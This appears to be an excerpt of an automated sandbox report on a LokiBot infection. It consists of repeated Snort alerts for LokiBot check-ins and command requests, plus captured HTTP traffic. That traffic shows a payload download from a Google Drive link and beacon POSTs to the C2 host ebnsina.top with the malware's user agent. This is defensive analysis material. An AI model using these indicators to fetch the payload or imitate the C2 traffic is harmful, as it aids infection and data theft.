Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49801 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49802 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49802 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49802 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49802 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49802 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49803 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49803 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49803 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49803 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49803 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49804 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49804 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49804 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49804 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49804 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49805 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49805 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49805 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49805 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49806 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49806 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49806 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49806 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49806 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49807 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49807 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49807 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49807 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49807 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49808 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49808 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49808 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49808 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49808 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49809 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49809 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49809 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49809 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49809 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49810 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49810 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49810 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49810 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49810 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49811 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49811 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49811 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49811 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49811 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49812 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49812 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49812 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49813 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49813 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49813 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49813 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49813 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49814 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49814 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49814 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49814 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49814 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49815 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49815 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49815 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49815 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49815 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49816 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49816 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49816 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49816 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49816 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49817 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49817 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49817 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49817 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49817 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49818 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49818 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49818 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49818 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49818 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49819 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49819 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49819 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49819 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49819 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49820 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49820 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49820 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49820 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49820 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49821 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49821 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49821 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49821 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49821 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49822 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49822 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49822 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49822 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49822 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49823 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49823 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49823 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49823 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49823 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49824 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49824 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49824 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49824 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49824 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49825 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49825 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49825 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49825 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49825 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49826 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49826 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49826 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49826 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49826 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49827 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49827 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49827 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49827 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49827 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49828 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49828 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49828 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49828 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49828 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49829 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49829 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49829 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49829 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49829 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49830 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49830 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49830 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49830 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49830 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49831 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49831 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49831 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49831 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49831 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49832 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49832 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49832 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49832 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49832 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49833 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49833 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49833 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49833 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49833 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49834 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49834 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49834 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49834 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49834 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49835 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49835 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49835 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49835 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49835 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49836 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49836 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49836 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49836 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49836 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49837 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49837 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49837 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49837 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49837 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49838 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49838 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49838 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49838 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49838 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49839 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49839 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49839 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49839 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49839 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49840 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49840 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49840 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49840 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49840 -> 104.21.13.124:80

Source: Joe Sandbox View

IP Address: 104.21.13.124 104.21.13.124

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
